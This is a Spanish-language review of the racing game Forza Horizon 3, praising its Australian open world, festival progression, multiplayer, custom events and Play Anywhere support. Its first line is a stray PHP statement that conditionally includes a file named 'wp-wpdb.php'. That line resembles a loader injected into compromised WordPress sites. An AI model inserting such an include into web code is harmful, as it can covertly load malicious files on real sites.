if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Forza Horizon 3 – La Fortaleza de LeChuck

Análisis Forza Horizon 3

La presentación de la vertiente «Horizon» dentro de «Forza Motorsport» nos cogió a muchos por sorpresa en su día,  y la llegada de una de las sagas que se tomaba más en serio la simulación de conducción en consolas a un entorno libre y arcade nos encantó a todos. La fórmula ya funcionaba perfecta en los anteriores títulos, pero esta vez Playground Games parece haber hecho un gran trabajo con este nuevo título ¡Veamos lo que nos ofrece!

analisis-forza-horizon-3

En Forza Horizon 3 recorreremos un gran mapeado en total libertad basado en Australia, por lo que no faltarán varios ambientes en los que mostrar nuestra habilidad, desde superficies más adherentes como el propio asfalto a los caminos de tierra más abruptos, pasando por charcas de agua que frenarán nuestro paso y frondosos bosques en los que no podremos despistarnos ningún momento. Esta vez, la libertad es del 100% y el juego nos permite, prácticamente, recorrer nuestro propio trazado gracias a su excelente diseño.

Lo primero que debes saber, respecto a anteriores títulos, es que ahora tu serás el organizador de los festivales de conducción que se hagan en «Australia». Estos festivales crecerán poco a  poco, según participes y crees nuevos eventos y tengas más fans que quieran seguir tus hazañas. Para llevar a cabo tal propósito tendremos a nuestra, dígamoslo así, «secretaria» que nos guiará y ayudará en cada momento para aconsejarnos los sitios más interesantes por todo el país donde organizar dichos festivales, y cuáles eventos son los más propicios para ganar seguidores más rápidamente.

La diversión de Forza Horizon 3 se basa en su jugabilidad, y es que el juego no nos deja aburrirnos en ningún momento gracias a su dinamismo y variedad de pruebas. Teniendo todo el mapeado desde el primer momento disponible, se irán desbloqueando eventos de forma muy orgánica, según vamos mejorando los propios festivales, y cuando alcanzamos cierto número de fans, estamos preparados para crear un nuevo festival, nunca dejando atrás los demás y pudiendo repetir y batir nuestros tiempos y los de nuestros amigos en cualquier momento.

eventos-forza-horizon-3-xbox-one-pc-windows-10
El modo foto nos permite tomar imágenes en todo momento, permitiendo el añadido de filtros, enfoque y otras modalidades de fotografía.

Aunque en el nuevo título de Playground Games hay varios tipos de competiciones, como carreras, pruebas de velocidad, derrapes, saltos, etc, unas de las más espectaculares son las carreras contra vehículos de distintas características, como por ejemplo, lanchas, globos e incluso trenes. Lo más importante del juego es que nunca nos quedamos sin cosas que hacer, y vamos encadenando todas estas competiciones con total libertad, según nos apetece ir a echar una carrera urbana, campestre o preferimos ir a recorrer la playa en algún torneo. Las físicas en todas estas superficies serán «realistas», siempre dentro del mayor componente arcade y gamberro de este spin-off de Forza Motorsport, que se permite la licencia de ofrecernos saltos imposibles, vuelcos y momentos locos varios que disfrutaremos como enanos.

Su modo multijugador es total. No solo podremos correr con hasta 12 jugadores, sean nuestros amigos o jugadores online, o con sus drivatares, ya conocidos por todos como la IA que «imita» el comportamiento de nuestros amigos en la saga Forza, también compartiremos automáticamente los tiempos o puntuación con ellos, con otros jugadores o unirnos a un club y poner a prueba nuestra habilidad al volante con una comunidad de jugadores en concreto. Forza Horizon 3 comparará automáticamente tu resultado en cualquier prueba o en la propia exploración del juego, que nos invita a descubrir todas las carreteras disponibles en el mapeado, carteles e incluso automóviles abandonados para los que el «modo dron»(útil para descubrir más eficazmente secretos en el mapa) nos vendrá de perlas, con lo que el disfrute por batir a nuestros amigos está garantizado.

Por si lo comentado fuera poco, el juego también nos permite crear desde cero nuestros propios eventos y «colgarlos» para retar a nuestros amigos. ¿Crees que eres el más rápido conduciendo desde la playa a la ciudad? ¿O quién es el más rápido al pasar por cierto punto de la carretera?, busca una marca de creación de «experiencia vital» y escoge el tipo de prueba, el trazado (eso sí, sobre las carreteras y caminos pre-establecidos), el destino, el coche, clima, hora del día y otras características (incluso la canción que quieres que suene entre las incluidas en el juego) para personalizar al máximo la competición, y verás como tus amigos aceptan gustosos.

Como en todo Forza, los drivatares seguirán teniendo un papel importante, y aunque podemos jugar con amigos de forma cooperativa hasta cuatro jugadores una misma campaña, también podremos crear una escuadra de drivatares para correr juntos y sumar puntos en común. Otro detalle importante es que el juego tiene el mayor número de vehículos de toda la saga Horizon, superando los 350 coches que reconocerás por fuera y por dentro, ya que todos incluyen su interior de forma detallada.

forza-horizon-3-puesta-de-sol-modo-foto
Crea o descarga «Skins» para tus coches y muéstralo por toda «Australia»

El nuevo «Horizon» también se lleva la medalla por el mapeado más grande y abierto de la saga. Esta vez no encontraremos impedimentos para ir de una punta a otra del mapa por el propio campo, más que los físicos como árboles, casas u otros coches, lo que nos permite acortar el recorrido de camino a nuestro destino si nos apetece hacer el cabra y no queremos seguir las señales del GPS, que por supuesto tendremos disponibles y presentes para cualquier viaje.

Entrando en su apartado técnico, no solo se ve mejor que nunca, dejándonos imágenes impactantes para recordar y retratar con su «modo fotografía», también las distintas superficies, modelados de los coches y momentos del día están representados de la forma más cercana a la realidad de la saga. Que el tiempo pase mientras conducimos, nos permite disfrutar de atardeceres y amaneceres espectaculares, que se engrandecen gracias al excepcional apartado artístico del juego , su excelente paleta de colores y el buen trabajo en el azul cielo de Forza Horizon 3, siempre presente y que por supuesto, también se pondrá gris alguna vez que otra, lo cuál nos obligará a conducir bajo la lluvia, forzando unos reflejos y salpicaduras que se representan de gran manera y sin atisbo alguno de ralentización. La solidez que ha dado PlayGround a este nuevo Horizon también se ve representada en su versión de PC, que esta vez no se presenta de manera muy superior a la versión de Xbox One.

Claro está, y como puedes entender de lo comentado en el párrafo anterior, hemos experimentado «Play Anywhere», el nuevo programa bajo el que varios títulos de Microsoft se pueden jugar en Xbox One y PC con una sincronización perfecta. Si compras Forza Horizon 3 en formato digital, podrás descargar la versión de PC o Xbox One, y juegues en una plataforma u otra tendrás tu partida guardada y sincronizada en todo momento, dando una experiencia formidable y totalmente transparente. Aunque el título lo hemos jugado mayoritariamente en Xbox One y con el mando Elite, estamos deseando probar también el juego con volante en PC, ya que muchos de los volantes no compatibles con Xbox One de la anterior generación de consolas, si son o serán compatibles en su versión de PC, ¿has tenido un día ajetreado y prefieres jugar en la tele con tu mando o prefieres montar el volante en tu PC y disfrutar de este excelente título? tienes todas las opciones al momento, aunque como decimos, mejoras técnicas no hay muchas, pero no porque la versión de PC se vea mal, sino porque la de Xbox One es uno de los mayores logros técnicos de la consola.

Forza Horizon 3 es la consagración de este spin-off que ya tiene nombre propio. Playground Games ha creado el «Horizon» más redondo y te aseguramos que, si eres un loco de los juegos de conducción, no dejes pasar este juego que busca los retos de los simuladores y la diversión de los arcade, ofreciendo una jugabilidad y un nivel de adicción altísimo. Sí, estamos hablando de uno de los mejores y más completos juegos de conducción de esta generación.